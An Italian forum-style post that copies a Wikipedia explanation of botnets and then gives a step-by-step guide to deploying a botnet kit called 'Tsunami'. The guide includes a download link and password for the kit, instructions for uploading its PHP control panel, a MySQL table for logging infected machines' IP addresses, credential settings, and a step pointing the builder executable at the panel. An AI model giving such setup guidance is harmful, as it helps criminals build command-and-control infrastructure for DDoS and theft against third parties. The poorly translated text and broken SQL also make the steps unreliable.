Che cos'è una BotNet?
Una botnet è una rete di computer collegati ad internet che fanno parte di un insieme di computer controllato da un'unica entità, il botmaster. Ciò può essere causato da falle nella sicurezza o mancanza di attenzione da parte dell'utente e dell'amministratore di sistema, per cui i computer vengono infettati da virus informatici o trojan i quali consentono ai loro creatori di controllare il sistema da remoto. I controllori della botnet possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali. I computer che compongono la botnet sono chiamati bot (da roBOT) o zombie.
Modalità di funzionamento e uso
I malware creati per far parte di una botnet, non appena assunto il controllo del sistema, devono poter fornire al proprio autore i dati relativi al sistema infettato. Per fare ciò spesso sfruttano i canali IRC (Internet Relay Chat) e si connettono ad un dato canale, situato su un dato server, il quale spesso è protetto da una password per dare accesso esclusivo all'autore. Tramite il canale di chat l'autore è in grado di controllare contemporaneamente tutti i sistemi infetti collegati al canale (i quali possono essere anche decine di migliaia) e di impartire ordini a questi. Per fare un esempio, con un solo comando potrebbe far partire un attacco DDoS verso un sistema a sua scelta.
Un altro sistema utilizzato dai botmaster per controllare i bot sono le reti peer-to-peer (tra queste è compresa la rete di skype). In questo caso la rete p2p viene usata come veicolo per le informazioni che il botmaster invia ai bot.
Le botnet vengono spesso utilizzate anche per altri scopi oltre al DDoS: questi virus sono spesso programmati in modo da spiare il sistema infetto e intercettare password ed altre informazioni utili. Possono anche offrire accesso alle macchine infette tramite backdoor oppure servizi proxy che garantiscono l'anonimato in rete.
Infine un altro uso delle botnet è come proxy verso un sistema compromesso. I bot infatti spesso vengono "ripuliti" e quindi di fatto non fanno parte più della botnet. Se un pirata installa un server su una di queste macchine e ne perde il controllo il danno è grave. Una tecnica usata recentemente è quella del fastflux[1] in cui una macchina fuori dalla botnet fa girare un finto server (per esempio per fare dello spoofing) e le macchine della botnet fungono solo da proxy verso questa macchina.
By Wikipedia.
Allora prima di tutto scaricate la BotNet, chiama Tsunami.
http://www.megaupload.com/?d=XL9AZWW6
Password: Tsunami.
Le cose di qui si deve aver bisogno:
Il Programma (TsunamiOverHost.exe, 4 file in una cartella che sarà: index.php, online.php, update.php, e update.txt)
Host
MySQL (una banca dati in cui potrai creare un "botnet" tabella)
/ / Caricamento / /
Ok, dopo aver caricato il vostro host, bisogna:
1. Creare una cartella.
2. Copia index.php, online.php, update.php, update.txt.
3. Incollarlo nella cartella che abbiamo creato.
4. Apri index.php con alcuni editor di testo, e dove c'è:
SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.
$login = "yourLogin";
$password = "yourPassword";
Salvare.
1. Andiamo sul database mysql.
2. Creare un nuovo database.
3. Creare una nuova tabella, aprire sql manager e incollare questo:
CREATE TABLE botnet (
data int NOT NULL,
ip varchar (40) NOT NULL,
b_id unsigned int chiave primaria NOT NULL AUTO_INCREMENT
);
4. Salvarlo.
5. Ora apriamo il file online.php e cerchiamo:
"Set MySQL database variables" - You will find four variables that you need to fill out.
$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( utente del database ) ";
$online_db_pass = "yourPass ( password del database )";
Salvare.
Ora nella tua cartella di dovrebbe avere 2 file aggiornati, ora:
1. Collegare al vostro ftp (ad es. Utilizzando FlashFXP)
2. Copirea la cartella che avete fatto per il vostro ospite.
3. Cambiare il Chmod del file di update.txt a 777.
4. Disconnettere.
Dopo aver impostato tutto, si aprirà TsunamiOverHost.exe, e dare il percorso della cartella che avete appena aggiornato per
il vostro ftp. (Ad es. Domain.com / pannello)
